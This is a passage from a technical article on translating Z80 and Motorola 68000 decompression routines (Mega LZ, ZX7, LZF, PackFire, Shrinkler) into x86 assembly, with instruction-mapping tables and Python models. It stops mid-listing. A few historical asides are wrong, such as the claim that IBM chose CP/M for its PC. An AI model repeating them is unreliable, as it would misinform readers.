    Z80 x86 Description
    bit test Perform a bitwise AND, set state flags and discard result.
    ccf cmc Inverts/Complements the carry flag.
    cp cmp Performs subtraction from A. Sets flags and discards result.
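    djnz loop Decrements B and jumps to a label if the result is Not Zero. If B is mapped to ECX (or BC to CX), LOOP is a direct replacement. When the loop body is a single string operation, a REP prefix may do the job instead.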
    ex xchg Exchanges two 16-bit values.
    exx EXX exchanges BC, DE, and HL with the shadow registers BC’, DE’, and HL’. Unfortunately, nothing like this is available on x86. Try to use spare registers or rewrite the algorithm to avoid using EXX.
    jp jmp / jcc Conditional or unconditional jump to an absolute address.
    jr jmp / jcc Conditional or unconditional jump to a relative address within a signed 8-bit displacement (roughly 128 bytes ahead or behind).
    ld mov Load/Copy immediate value or register to another register.
    ldi movsb Performs a “LD (DE),(HL)”, then increments DE and HL and decrements BC. Map HL to SI and DE to DI (ESI and EDI in 32-bit code) and you can perform the same copy quite easily on x86, although MOVSB leaves the counter untouched.
    ldir rep movsb Repeats LDI (LD (DE),(HL), then increments DE and HL, and decrements BC) until BC=0. Note that if BC=0 before this instruction is executed, it wraps around and copies 65536 bytes before BC reaches 0 again.
    res btr Reset bit. BTR doesn’t behave exactly the same, but it’s close enough. An alternative might be masking with AND.
    rl / rla rcl or adc The register is shifted left and the carry flag is put into bit zero of the register. The 7th bit is put into the carry flag. You can perform the same operation using ADC (Add with Carry) of a register with itself.
    rlc / rlca rol 8-bit rotation to the left. The 7th bit is copied into both the carry flag and bit zero.
    rld Performs a 4-bit leftward rotation of the 12-bit number whose 4 most significant bits are the 4 least significant bits of A, and whose 8 least significant bits are in (HL).
    rr / rra / r rcr 9-bit rotation to the right. The carry is copied into bit 7, and the bit leaving on the right is copied into the carry.
    rra Performs a RR A faster, and modifies the flags differently.
    sbc sbb Sum of second operand and carry flag is subtracted from the first operand. Results are written into the first operand.
    sla sal Arithmetic shift left 1 bit. Bit 7 goes to the carry flag and a 0 is put into bit 0.
    sll/sl1 shl An “undocumented” instruction. Functions like sla, except a 1 is inserted into the low bit.
    sra sar Arithmetic shift right 1 bit, bit 0 goes to carry flag, bit 7 remains unchanged.
    srl shr Like SRA, except a 0 is put into bit 7. The bits are all shifted right, with bit 0 put into the carry flag.
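
    The rotate and shift rows are the easiest ones to mix up, so here is a small Python model of the 8-bit behaviour described in the table. It is only a sketch: each function returns a (result, carry) pair, the flags other than carry are ignored, and the function names simply mirror the Z80 mnemonics.

```python
def rl(value, carry):
    """Z80 RL / RLA: 9-bit rotate left through carry (x86 RCL r8, 1)."""
    result = (value << 1) | carry
    return result & 0xFF, result >> 8


def adc_self(value, carry):
    """x86 ADC r8, r8: value + value + carry, which matches rl() above."""
    result = value + value + carry
    return result & 0xFF, result >> 8


def rlc(value):
    """Z80 RLC / RLCA: 8-bit rotate left (x86 ROL r8, 1)."""
    carry = value >> 7
    return ((value << 1) | carry) & 0xFF, carry


def rr(value, carry):
    """Z80 RR / RRA: 9-bit rotate right through carry (x86 RCR r8, 1)."""
    return (value >> 1) | (carry << 7), value & 1


def sla(value):
    """Z80 SLA: shift left, 0 into bit 0 (x86 SAL/SHL r8, 1)."""
    return (value << 1) & 0xFF, value >> 7


def sll(value):
    """Undocumented Z80 SLL: shift left, 1 into bit 0 (x86 STC + RCL r8, 1)."""
    return ((value << 1) | 1) & 0xFF, value >> 7


def sra(value):
    """Z80 SRA: shift right, bit 7 preserved (x86 SAR r8, 1)."""
    return (value >> 1) | (value & 0x80), value & 1


def srl(value):
    """Z80 SRL: shift right, 0 into bit 7 (x86 SHR r8, 1)."""
    return value >> 1, value & 1


print(rl(0x80, 0), rlc(0x80))    # same input, different bit 0
print(sla(0x40), sll(0x40))      # SLL sets bit 0, SLA clears it
```

    Note that a plain SHL is not a drop-in replacement for SLL, because SHL always shifts a 0 into bit 0.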

    10.1 Mega LZ

    Designed by the demo group MAYhEM and published in 2005. The original Z80 decoder by fyrex was optimized by Introspec in 2017 while researching 8-Bit compression algorithms. The x86 assembly below is based on that optimized decoder and uses the following register mapping.

    Register Mapping
    Z80 x86
    A AL
    B EBX
    C ECX
    D DH
    E DL
    HL ESI
    DE EDI

    EBX and ECX stand in for the B and C registers to save a few bytes: in 32-bit code, incrementing or decrementing a 32-bit register takes one byte, while the 8-bit form takes two.

    megalz_depack:
    _megalz_depack:
        pushad
        
        mov    esi, [esp+32+12]  ; esi = inbuf
        mov    edi, [esp+32+ 4]  ; edi = outbuf
        
        call   init_get_bit
        
        add    al, al            ; add a, a
        jnz    exit_get_bit      ; ret nz
        lodsb                    ; ld a, (hl)
                                 ; inc hl
        adc    al, al            ; rla
    exit_get_bit:
        ret                      ; ret
    init_get_bit:
        pop    ebp               ;
        mov    al, 128           ; ld a, 128
    mlz_literal:
        movsb                    ; ldi
    mlz_main:
        call   ebp               ; GET_BIT
        jc     mlz_literal       ; jr c, mlz_literal
        xor    edx, edx
        mov    dh, -1            ; ld d, #FF
        xor    ebx, ebx          ; ld bc, 2
        push   2
        pop    ecx
        call   ebp               ; GET_BIT
        jc     CASE01x           ; jr c, CASE01x
        call   ebp               ; GET_BIT
        jc     mlz_short_ofs     ; jr c, mlz_short_ofs
    CASE000:
        dec    ecx               ; dec c
        mov    dl, 63            ; ld e, %00111111
    ReadThreeBits:
        call   ebp               ; GET_BIT
        adc    dl, dl            ; rl e
        jnc    ReadThreeBits     ; jr nc, ReadThreeBits
    mlz_copy_bytes:
        push   esi               ; push hl
        movsx  edx, dx           ; sign-extend dx to 32-bits
        lea    esi, [edi+edx]    ; 
        rep    movsb             ; ldir
        pop    esi               ; pop hl
        jmp    mlz_main          ; jr mlz_main
    CASE01x:
        call   ebp               ; GET_BIT
        jnc    CASE010           ; jr nc, CASE010
        dec    ecx               ; dec c
    ReadLogLength:
        call   ebp               ; GET_BIT
        inc    ebx               ; inc b
        jnc    ReadLogLength     ; jr nc, ReadLogLength
    mlz_read_len:
        call   ebp               ; GET_BIT
        adc    cl, cl            ; rl c
        jc     mlz_exit          ; jr c, mlz_exit
        dec    ebx               ; djnz mlz_read_len
        jnz    mlz_read_len
        inc    ecx               ; inc c
    CASE010:
        inc    ecx               ; inc c
        call   ebp               ; GET_BIT
        jnc    mlz_short_ofs     ; jr nc, mlz_short_ofs
        mov    dh, 31            ; ld d, %00011111
    mlz_long_ofs:
        call   ebp               ; GET_BIT
        adc    dh, dh            ; rl d
        jnc    mlz_long_ofs      ; jr nc, mlz_long_ofs
        dec    edx               ; dec d
    mlz_short_ofs:
        mov    dl, [esi]         ; ld e, (hl)
        inc    esi               ; inc hl
        jmp    mlz_copy_bytes    ; jr mlz_copy_bytes
    mlz_exit:
        sub    edi, [esp+32+4]
        mov    [esp+28], edi     ; eax = decompressed length
        popad
        ret
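
    The GET_BIT routine in the listing above relies on a sentinel bit: the accumulator starts at 128, every call shifts it left, and a result of zero means only the sentinel was left, so a fresh byte is loaded and the sentinel is rotated back in through the carry. The Python sketch below models that behaviour. The class and attribute names are made up for this illustration.

```python
class BitReader:
    """Models the add al,al / jnz / lodsb / adc al,al sequence."""

    def __init__(self, data):
        self.data = data
        self.pos = 0
        self.acc = 0x80                  # mov al, 128: sentinel only

    def get_bit(self):
        shifted = self.acc << 1          # add al, al
        carry = shifted >> 8
        acc = shifted & 0xFF
        if acc == 0:                     # only the sentinel was left
            byte = self.data[self.pos]   # lodsb
            self.pos += 1
            shifted = (byte << 1) | carry    # adc al, al: sentinel enters bit 0
            carry = shifted >> 8
            acc = shifted & 0xFF
        self.acc = acc
        return carry


reader = BitReader(bytes([0xA5]))
print([reader.get_bit() for _ in range(8)])   # bits of 0xA5, most significant first
```

    The appeal of the trick is that no separate bit counter is needed, which is why the same routine reappears in the ZX7 decoders below.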
    

    10.2 ZX7

    Designed by Einar Saukas and published in 2012. ZX7 is an optimal LZ77 algorithm for the ZX-Spectrum using a combination of fixed length and variable length Gamma codes for the match length and offset. The following is a translation of the standard Z80 depacker to 32-bit x86 assembly in about 111 bytes.

    Register Mapping
    Z80 x86
    A AL
    B CH
    C CL
    BC CX
    D DH
    E DL
    HL ESI
    DE EDX or EDI

    dzx7_standard:
    _dzx7_standard:
        pushad
        
        ; tested on Windows
        mov    esi, [esp+32+12]     ; hl = source
        mov    edi, [esp+32+ 4]     ; de = destination
        
        mov    al, 0x80             ; ld      a, $80
    dzx7s_copy_byte_loop:
        ; copy literal byte
        movsb                       ; ldi                             
    dzx7s_main_loop:
        call   dzx7s_next_bit       ; call    dzx7s_next_bit
    ; next bit indicates either literal or sequence
        jnc    dzx7s_copy_byte_loop ; jr      nc, dzx7s_copy_byte_loop
    
    ; determine number of bits used for length (Elias gamma coding)
        push   edi                  ; push    de
        mov    ecx, 0               ; ld      bc, 0
        xor    edx, edx             ; ld      d, b (also clears the upper half of EDX, which SBB uses below)
    dzx7s_len_size_loop:
        inc    dh                   ; inc     d
        call   dzx7s_next_bit       ; call    dzx7s_next_bit
        jnc    dzx7s_len_size_loop  ; jr      nc, dzx7s_len_size_loop
    ; determine length
    dzx7s_len_value_loop:
        jc     skip_call
        call   dzx7s_next_bit       ; call    nc, dzx7s_next_bit
    skip_call:
        rcl    cl, 1                ; rl      c
        rcl    ch, 1                ; rl      b
        ; check end marker
        jc     dzx7s_exit           ; jr      c, dzx7s_exit           
        dec    dh                   ; dec     d
        jnz    dzx7s_len_value_loop ; jr      nz, dzx7s_len_value_loop
        ; adjust length
        inc    cx                   ; inc     bc                      
    
    ; determine offset
        ; load offset flag (1 bit) + offset value (7 bits)
        mov    dl, [esi]            ; ld      e, (hl)                 
        inc    esi                  ; inc     hl
        ; opcode for undocumented instruction "SLL E" aka "SLS E"
        ; SLL shifts a 1 into bit 0, so set the carry and rotate it in
        stc
        rcl    dl, 1                ; defb    $cb, $33                
        ; if offset flag is set, load 4 extra bits
        jnc    dzx7s_offset_end     ; jr      nc, dzx7s_offset_end    
        ; bit marker to load 4 bits
        mov    dh, 0x10             ; ld      d, $10                  
    dzx7s_rld_next_bit:
        call   dzx7s_next_bit       ; call    dzx7s_next_bit
        ; insert next bit into D
        rcl    dh, 1                ; rl      d                       
        ; repeat 4 times, until bit marker is out
        jnc    dzx7s_rld_next_bit   ; jr      nc, dzx7s_rld_next_bit  
        ; add 128 to DE
        inc    dh                   ; inc     d 
        ; retrieve fourth bit from D                      
        shr    dh, 1                ; srl	d			
    dzx7s_offset_end:
        ; insert fourth bit into E
        rcr    dl, 1                ; rr      e                       
    
    ; copy previous sequence
        ; store source, restore destination
        xchg   esi, [esp]           ; ex      (sp), hl 
        ; store destination
        push   esi                  ; push    hl                      
        ; HL = destination - offset - 1
        sbb    esi, edx             ; sbc     hl, de                  
        ; DE = destination
        pop    edi                  ; pop     de                      
        rep    movsb                ; ldir
    dzx7s_exit:
        pop    esi                  ; pop     hl             
        jnc    dzx7s_main_loop      ; jr      nc, dzx7s_main_loop
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
    dzx7s_next_bit:
        ; check next bit
        add    al, al               ; add     a, a    
        ; no more bits left?
        jnz    exit_get_bit         ; ret     nz      
        ; load another group of 8 bits
        mov    al, [esi]            ; ld      a, (hl) 
        inc    esi                  ; inc     hl
        rcl    al, 1                ; rla
    exit_get_bit:
        ret                         ; ret
    

    The following is a 32-Bit port of the size-optimized 16-bit decoder implemented by Trixter and Qkumba in 2016. It’s currently 81 bytes.

    zx7_depack:
    _zx7_depack:
        pushad
        mov    edi, [esp+32+ 4] ; output
        mov    esi, [esp+32+12] ; input
        
        call   init_get_bit
        add    al, al           ; check next bit
        jnz    exit_get_bit     ; no more bits left?
        lodsb                   ; load another group of 8 bits
        adc    al, al
    exit_get_bit:
        ret
    init_get_bit:
        pop    ebp
        mov    al, 80h
        xor    ecx, ecx
    copy_byte:
        movsb                    ; copy literal byte
    main_loop:
        call   ebp
        jnc    copy_byte         ; next bit indicates either
                                 ; literal or sequence
    ; determine number of bits used for length (Elias gamma coding)
        xor    ebx, ebx
    len_size_loop:
        inc    ebx
        call   ebp
        jnc    len_size_loop
        jmp    len_value_skip
    ; determine length
    len_value_loop:
        call   ebp
    len_value_skip:
        adc    cx, cx
        jc     zx7_exit       ; check end marker
        
        dec    ebx
        jnz    len_value_loop
        
        inc    ecx            ; adjust length
                              ; determine offset
        mov    bl, [esi]      ; load offset flag (1 bit) +
                              ; offset value (7 bits)
        inc    esi
        stc
        adc    bl, bl
        jnc    offset_end     ; if offset flag is set, load
                              ; 4 extra bits
        mov    bh, 10h        ; bit marker to load 4 bits
    rld_next_bit:
        call   ebp
        adc    bh, bh         ; insert next bit into D
        jnc    rld_next_bit   ; repeat 4 times, until bit
                              ; marker is out
        inc    bh             ; add 256 to DE
    offset_end:
        shr    ebx, 1         ; insert fourth bit into E
        push   esi
        mov    esi, edi
        sbb    esi, ebx       ; destination = destination - offset - 1
        rep    movsb
        pop    esi            ; restore source address
        jmp    main_loop
    zx7_exit:
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
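
    For readers who find the flag juggling hard to follow, the same format can be sketched in Python. This is my reading of the stream layout implied by the listings above (literal flag, Elias gamma length, 7-bit offset with an optional 4 extra bits, and an end marker of 16 zero bits), not the author's reference code. The function name and the hand-built test stream are assumptions.

```python
def dzx7(data):
    """Decompress a ZX7 stream, following the layout the decoders above expect."""
    out = bytearray()
    pos = 0
    bit_mask = 0
    bit_value = 0

    def read_byte():
        nonlocal pos
        value = data[pos]
        pos += 1
        return value

    def read_bit():
        nonlocal bit_mask, bit_value
        bit_mask >>= 1
        if bit_mask == 0:                # bit buffer empty: fetch 8 more bits
            bit_mask = 0x80
            bit_value = read_byte()
        return 1 if bit_value & bit_mask else 0

    def read_gamma():
        zeros = 0
        while not read_bit():
            zeros += 1
        if zeros > 15:                   # 16 zeros in a row: end marker
            return -1
        value = 1
        for _ in range(zeros):
            value = (value << 1) | read_bit()
        return value

    def read_offset():
        value = read_byte()
        if value < 128:                  # offset flag clear: 7-bit offset
            return value
        extra = 0
        for _ in range(4):               # flag set: 4 extra bits follow
            extra = (extra << 1) | read_bit()
        return ((value & 127) | (extra << 7)) + 128

    out.append(read_byte())              # first byte is always a literal
    while True:
        if not read_bit():
            out.append(read_byte())      # 0 = literal
            continue
        length = read_gamma() + 1        # 1 = match
        if length == 0:
            return bytes(out)
        distance = read_offset() + 1     # destination - offset - 1
        for _ in range(length):
            out.append(out[-distance])


# literal 'a', then a 3-byte match at distance 1, then the end marker
print(dzx7(bytes([0x61, 0xA8, 0x00, 0x00, 0x04])))
```

    Note the `+ 1` on the distance: it corresponds to the 1 that SLL (or STC followed by ADC) shifts into the offset byte before the subtraction with carry.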
    

    10.3 ZX7 Mini

    Designed by Antonio Villena and published in 2019. This version uses less code at the expense of the compression ratio. Nevertheless, it’s a great example to demonstrate the conversion between Z80 and x86.

    Register Mapping
    Z80 x86
    A AL
    BC ECX
    D DH
    E DL
    HL ESI
    DE EDI

    zx7_depack:
    _zx7_depack:
        pushad
    
        mov    esi, [esp+32+4] ; esi = in
        mov    edi, [esp+32+8] ; edi = out
    
        call   init_getbit
    getbit:  
        add    al, al          ; add     a, a
        jnz    exit_getbit     ; ret     nz
        lodsb                  ; ld      a, (hl)
                               ; inc     hl
        adc    al, al          ; adc     a, a
    exit_getbit:
        ret
    init_getbit:
        pop    ebp             ;
        mov    al, 80h         ; ld      a, $80
    copyby:  
        movsb                  ; ldi
    mainlo:
        call   ebp             ; call    getbit
        jnc    copyby          ; jr      nc, copyby
        push   1               ; ld      bc, 1
        pop    ecx
    lenval:  
        call   ebp             ; call    getbit
        rcl    cl, 1           ; rl      c
        jc     exit_depack     ; ret     c
        call   ebp             ; call    getbit
        jnc    lenval          ; jr      nc, lenval
        push   esi             ; push    hl
        movzx  edx, byte[esi]  ; ld      l, (hl)
        mov    esi, edi
        sbb    esi, edx        ; sbc     hl, de
        rep    movsb           ; ldir
        pop    esi             ; pop     hl
        inc    esi             ; inc     hl
        jmp    mainlo          ; jr      mainlo
    exit_depack:
        sub    edi, [esp+32+8] ;
        mov    [esp+28], edi
        popad
        ret
    

    10.4 LZF

    LibLZF was designed by Marc Lehmann. In 2013, Ilya “encode” Muravyov implemented a version that doesn’t include headers or checksums. The x86 assembly is a translation of a size-optimized Z80 version by Introspec.

    lzf_depack:    
    _lzf_depack:    
        pushad
        mov    edi, [esp+32+4]   ; edi = outbuf
        mov    esi, [esp+32+8]   ; esi = inbuf
        
        xor    ecx, ecx          ; ld b,0 
        jmp    MainLoop          ; jr MainLoop  ; all copying is done by LDIR; B needs to be zero
    ProcessMatches:        
        push   eax               ; exa
        lodsb                    ; ld a,(hl)
                                 ; inc hl
                                 ; rlca  
                                 ; rlca  
        rol    al, 3             ; rlca 
        inc    al                ; inc a
        and    al, 00000111b     ; and %00000111 
        jnz    CopyingMatch      ; jr nz,CopyingMatch
    LongMatch:        
        lodsb                    ; ld a,(hl) 
        add    al, 8             ; add 8
                                 ; inc hl ; len == 9 means an extra len byte needs to be read
                                 ; jr nc,CopyingMatch 
                                 ; inc b
        adc    ch, ch
    CopyingMatch:        
        mov    cl, al            ; ld c,a 
        inc    ecx               ; inc bc 
        pop    eax               ; exa 
        cmp    al, 20h           ; token == #20 suggests a possibility of the end marker (#20,#00)
        jnz    NotTheEnd         ; jr nz,NotTheEnd 
        xor    al, al            ; xor a 
        cmp    [esi], al         ; cp (hl) 
        jz     exit              ; ret z   ; is it the end marker? return if it is
    NotTheEnd:
        and    al, 1fh           ; and %00011111 ; A' = high(offset); also, reset flag C for SBC below
        push   esi               ; push hl 
        movzx  edx, byte[esi]    ; ld l,(hl)  
        mov    dh, al            ; ld h,a                ; HL = offset
        movsx  edx, dx           ; 
                                 ; push de
        mov    esi, edi          ; ex de,hl              ; DE = offset, HL = dest
        sbb    esi, edx          ; sbc hl,de             ; HL = dest-offset
                                 ; pop de
        rep    movsb             ; ldir
        pop    esi               ; pop hl 
        inc    esi               ; inc hl
    MainLoop:        
        mov    al, [esi]         ; ld a,(hl) 
        cmp    al, 20h           ; cp #20  
        jnc    ProcessMatches    ; jr nc,ProcessMatches  ; tokens "000lllll" mean "copy lllll+1 literals"
        inc    al                ; inc a 
        mov    cl, al            ; ld c,a 
        inc    esi               ; inc hl 
        rep    movsb             ; ldir   ; actual copying of the literals
        jmp    MainLoop          ; jr MainLoop
    exit:
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
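
    The token format is easier to see without the register shuffling. The Python sketch below follows the listing above as I read it: tokens below #20 copy literals, other tokens encode a match whose length sits in the top three bits and whose 13-bit offset is subtracted from the output position as-is, and the pair (#20,#00) ends the stream. The function name and the test stream are assumptions, and the standard LibLZF format may differ in the details.

```python
def lzf_depack(data):
    """Decode the header-less LZF variant handled by the listing above."""
    out = bytearray()
    pos = 0
    while True:
        token = data[pos]
        pos += 1
        if token < 0x20:                 # 000lllll: copy lllll + 1 literals
            count = token + 1
            out += data[pos:pos + count]
            pos += count
            continue
        length = (token >> 5) + 2        # top three bits hold the length
        if length == 9:                  # field was 7: extra length byte
            length += data[pos]
            pos += 1
        offset = ((token & 0x1F) << 8) | data[pos]
        pos += 1
        if token == 0x20 and offset == 0:
            return bytes(out)            # end marker (#20,#00)
        for _ in range(length):          # byte-wise copy, may overlap
            out.append(out[-offset])


# 3 literals "abc", a 3-byte match at offset 3, then the end marker
stream = bytes([0x02, 0x61, 0x62, 0x63, 0x20, 0x03, 0x20, 0x00])
print(lzf_depack(stream))
```

    Copying one byte at a time matters here, because a match may overlap the bytes it is producing, exactly as REP MOVSB and LDIR do.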
    

    11. Motorola 68000 (68K)

    “Motorola, with its superior technology, lost the single most important design contest of the last 50 years” Walden C. Rhines

    A revolutionary CPU released in 1979 that includes eight 32-Bit general-purpose data registers (D0-D7) and eight address registers (A0-A7) used for function arguments and the stack pointer. The 68K was used in the Commodore Amiga, the Atari ST, and the Macintosh, as well as various fourth-generation gaming consoles like the Sega Mega Drive and arcade systems like Namco System 2. The 68K was more compelling than the Z80, 6502, 8088, and 8086, so why did it lose to Intel in the home computer war of the 1980s? The article “A history of the Amiga, part 10: The downfall of Commodore” offers some plausible answers. IBM choosing Control Program/Monitor by Gary Kildall for its 1980 PC operating system is also likely a factor.

    The following table lists some 68K instructions and the x86 instructions used to replace them.

    68K x86 Description
    move mov Copy data from source to destination
    add add Add binary.
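    addx adc Add with extend (carry).
    sub sub Subtract binary.
    subx sbb Subtract with extend (borrow).
    rts ret Return from subroutine.
    dbf/dbt loopne/loope Test condition, decrement, and branch. DBF keeps looping until the counter reaches -1, so a DEC followed by JNS is often a closer match.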
    bsr call Branch to subroutine
    bcs:bcc jc:jnc Branch/Jump if carry set. Jump if carry clear.
    beq:bne je:jne Branch/Jump if equal. Not equal.
    ble jle Branch/Jump if less than or equal.
    bra jmp Branch always.
    lsr shr Logical shift right.
    lsl shl Logical shift left.
    bhs jae Branch on higher than or same.
    bpl jns Branch on plus. Jump if not signed.
    bmi js Branch on minus. Jump if signed.
    tst test Compare an operand with zero and set the flags. On x86, TEST a register against itself.
    exg xchg Exchange registers.
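
    The DBF row deserves a closer look, because the loop count is easy to get wrong when translating. The Python sketch below models the two instructions as I understand them: DBF decrements the low 16 bits of its counter and branches until the counter reaches -1, whereas x86 LOOP decrements ECX and branches until it reaches 0. The function names are invented for this example.

```python
def dbf_iterations(d):
    """Count how often a loop body closed by 'dbf dN,label' runs."""
    runs = 0
    while True:
        runs += 1                        # loop body
        d = (d - 1) & 0xFFFF             # dbf works on the low word only
        if d == 0xFFFF:                  # counter reached -1: fall through
            break
    return runs


def loop_iterations(ecx):
    """Count how often a loop body closed by x86 'loop label' runs.

    Only call this with ecx >= 1: starting from 0 the counter wraps
    and the body would run 2**32 times.
    """
    runs = 0
    while True:
        runs += 1                        # loop body
        ecx = (ecx - 1) & 0xFFFFFFFF
        if ecx == 0:                     # counter reached 0: fall through
            break
    return runs


print(dbf_iterations(3), loop_iterations(3))
```

    With the same starting value, the DBF loop runs one more time than the LOOP version, which is why the PackFire translation below uses DEC and JNS instead.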

    11.1 PackFire

    Designed by neural and published in 2010, PackFire comprises two algorithms tailored for demos targeting the Atari ST. The first borrows ideas from Exomizer and is suitable for small files not exceeding ~40KB. The other borrows ideas from LZMA and is better suited to compressing larger files. The LZMA variant requires 16KB of RAM for the range decoder, which isn’t a problem for the Atari ST with between 512KB and 1024KB of RAM available. However, translating code written for the 68K to x86 isn’t easy, because the 68K offers sixteen data and address registers while 32-bit x86 has only eight general-purpose registers. Since its release, badc0de has published decoders for a variety of other architectures, including 32-Bit ARM. The following is the Exomizer-style decoder for files not exceeding ~40KB, which probably isn’t very useful unless you write demos for retro hardware.

    packfire_depack:    
    _packfire_depack:    
        pushad
        
        mov    ebp, [esp+32+4]   ; ebp = inbuf (a0)
        mov    edi, [esp+32+8]   ; edi = outbuf (a1)
        
        lea    esi, [ebp+26]     ; lea     26(a0),a2
        lodsb                    ; move.b  (a2)+,d7
    lit_copy:               
        movsb                    ; move.b  (a2)+,(a1)+
    main_loop:              
        call   get_bit           ; bsr.b   get_bit
        jc     lit_copy          ; bcs.b   lit_copy
        
        cdq                      ; moveq   #-1,d3
        dec    edx
    get_index:              
        inc    edx               ; addq.l  #1,d3
        call   get_bit           ; bsr.b   get_bit
        jnc    get_index         ; bcc.b   get_index
        
        cmp    edx, 0x10         ; cmp.w   #$10,d3
        je     depack_stop       ; beq.b   depack_stop
        
        call   get_pair          ; bsr.b   get_pair
        push   edx               ; move.w  d3,d6 ; save it for the copy
        cmp    edx, 2            ; cmp.w   #2,d3
        jle    out_of_range      ; ble.b   out_of_range
        
        cdq                      ; moveq   #0,d3
    out_of_range:
                                 ; move.b  table_len(pc,d3.w),d1
                                 ; move.b  table_dist(pc,d3.w),d0
        ; code without tables
        push   4                 ; d1 = 4
        pop    ecx
        push   16                ; d0 = 16
        pop    ebx
        dec    edx               ; d3--
        js     L0
        
        dec    edx
        mov    cl, 2             ; d1 = 2
        mov    bl, 48            ; d0 = 48
        js     L0
        
        mov    cl, 4             ; d1 = 4
        mov    bl, 32            ; d0 = 32
    L0:
        call   get_bits          ; bsr.b   get_bits
        call   get_pair          ; bsr.b   get_pair
        pop    ecx
        push   esi
        mov    esi, edi          ; move.l  a1,a3
        sub    esi, edx          ; sub.l   d3,a3
    copy_bytes:             
        rep    movsb             ; move.b  (a3)+,(a1)+
                                 ; subq.w  #1,d6
                                 ; bne.b   copy_bytes
        pop    esi
        jmp    main_loop         ; bra.b   main_loop
    get_pair:
        pushad
        cdq                      ; sub.l   a6,a6
                                 ; moveq   #$f,d2
    calc_len_dist:          
        mov    ebx, edx          ; move.w  a6,d0
        and    ebx, 15           ; and.w   d2,d0
        jne    node              ; bne.b   node
        push   1
        pop    edi               ; moveq   #1,d5
    node:                   
        mov    eax, edx          ; move.w  a6,d4
        shr    eax, 1            ; lsr.w   #1,d4    
        mov    cl, [ebp+eax]     ; move.b  (a0,d4.w),d1
        push   1                 ; moveq   #1,d4
        pop    eax
        and    ebx, eax          ; and.w   d4,d0
        je     nibble            ; beq.b   nibble
        shr    ecx, 4            ; lsr.b   #4,d1
    nibble:                 
        mov    ebx, edi          ; move.w  d5,d0
        and    ecx, 15           ; and.w   d2,d1
        shl    eax, cl           ; lsl.l   d1,d4
        add    edi, eax          ; add.l   d4,d5
        inc    edx               ; addq.w  #1,a6
    
        ; dbf  d3,calc_len_dist
        dec    dword[esp+pushad_t.edx] 
        jns    calc_len_dist
        ; save d0 and d1
        mov    [esp+pushad_t.ebx], ebx
        mov    [esp+pushad_t.ecx], ecx
        popad
    get_bits:               
        cdq                      ; moveq   #0,d3
    getting_bits:           
        dec    ecx               ; subq.b  #1,d1
        jns    cont_get_bit      ; bhs.b   cont_get_bit
        add    edx, ebx          ; add.w   d0,d3
        ret
    depack_stop:
        sub    edi, [esp+32+8]   ; 
        mov    [esp+pushad_t.eax], edi
        popad
        ret                      ; rts
    cont_get_bit:           
        call   get_bit           ; bsr.b   get_bit
        adc    edx, edx          ; addx.l  d3,d3
        jmp    getting_bits      ; bra.b   getting_bits
    get_bit:                
        add    al, al            ; add.b   d7,d7
        jne    byte_done         ; bne.b   byte_done
        lodsb                    ; move.b  (a2)+,d7
        adc    al, al            ; addx.b  d7,d7
    byte_done:              
        ret                      ; rts
    

    11.2 Shrinkler

    Designed by Aske Simon Christensen (Blueberry/Loonies) and published in 1999. It stores compressed data in Big-Endian 32-bit words, so the x86 translation must use BSWAP on each word before reading bits from the stream. The compressor is open source and could be updated to use Little-Endian format instead. Together with Rune Stubbe (Mentor/TBC), Christensen is also a co-author of Crinkler, an executable compressor that’s popular for 4K intros on Windows.
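
    The byte-order issue can be shown in a few lines of Python. This is only a sketch of the idea: a little-endian CPU that loads four stream bytes as one 32-bit word sees them reversed, and a byte swap restores the value the 68K would have read. The helper name bswap32 is made up here to mirror the x86 instruction.

```python
import struct


def bswap32(value):
    """Reverse the byte order of a 32-bit value, like x86 BSWAP."""
    return int.from_bytes(value.to_bytes(4, "little"), "big")


stream = bytes([0x12, 0x34, 0x56, 0x78])

as_68k = struct.unpack(">I", stream)[0]      # what a big-endian load yields
as_x86 = struct.unpack("<I", stream)[0]      # what a plain x86 load yields

print(hex(as_68k), hex(as_x86), hex(bswap32(as_x86)))
```

    After the swap, the most significant bit of the word is again the first bit of the stream, so the bit-reading logic can stay the same as on the 68K.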

    The following is a description from Blueberry:

    Shrinkler is optimized for target sizes around 4k (while still being good for 64k), which strongly favors decompression code size. It tries to achieve the best size for this target, somewhat at the expense of decompression speed. At the same time, it is intended to be useful on Amiga 500, which means that decompression speed should still be reasonable, and decompression memory usage should be small. Shrinkler decrunches a 64k intro in typically less than half a minute on Amiga 500, which is an acceptable wait time for starting an intro. And the memory needed for the probabilities fits within the default stack size of 4k on Amiga.

    Shrinkler also has special tweaks gearing it towards 16-bit oriented data (as all 68000 instructions are a multiple of 16 bits). Specifically, it keeps separate literal context groups for even and odd bytes, since these distributions are usually very different for Amiga data. Same thing for the flag indicating whether a literal or a match is coming up. This gives a great boost for Amiga intros, but it has no benefit for data that has arbitrary alignment. It usually doesn’t hurt either, except for the slight cost in decompression code size.

    The following is a translation of the 68K assembly to x86, with help from Blueberry.

        %define INIT_ONE_PROB       0x8000
        %define ADJUST_SHIFT        4
        %define SINGLE_BIT_CONTEXTS 1
        %define NUM_CONTEXTS        1536
    
        struc pushad_t
          .edi resd 1
          .esi resd 1    
          .ebp resd 1    
          .esp resd 1     
          .ebx resd 1
          .edx resd 1
          .ecx resd 1
          .eax resd 1
        endstruc
        
        ; temporary variables for range decoder
        %define d2   4*0
        %define d3   4*1
        %define d4   4*2
        %define prob 4*3
        
        %ifndef BIN
          global ShrinklerDecompress
          global _ShrinklerDecompress
        %endif
        
    ShrinklerDecompress:
    _ShrinklerDecompress:
        ; save d2-d7/a4-a6 on the stack, -(a7)
        pushad                   ; movem.l  d2-d7/a4-a6,-(a7)
    
        ; esi = inbuf    
        mov    esi, [esp+32+4]   ; move.l a0,a4
        ; edi = outbuf
        mov    edi, [esp+32+8]   ; move.l a1,a5
                                 ; move.l a1,a6
        ; allocate local memory for range decoder
        sub    esp, 4096
        test   [esp], esp        ; stack probe
        mov    ebp, esp          ; ebp = stack pointer
        
        ; Init range decoder state
        mov    dword[ebp+d2], 0  ; moveq.l  #0,d2
        mov    dword[ebp+d3], 1  ; moveq.l  #1,d3
        mov    dword[ebp+d4], 1  ; moveq.l  #1,d4
        ror    dword[ebp+d4], 1  ; ror.l  #1,d4
    
        ; Init probabilities
        mov    edx, NUM_CONTEXTS ; move.l #NUM_CONTEXTS, d6
    .init:  
        ; move.w  #INIT_ONE_PROB,-(a7)
        mov    word[prob+ebp+edx*2-2], INIT_ONE_PROB  
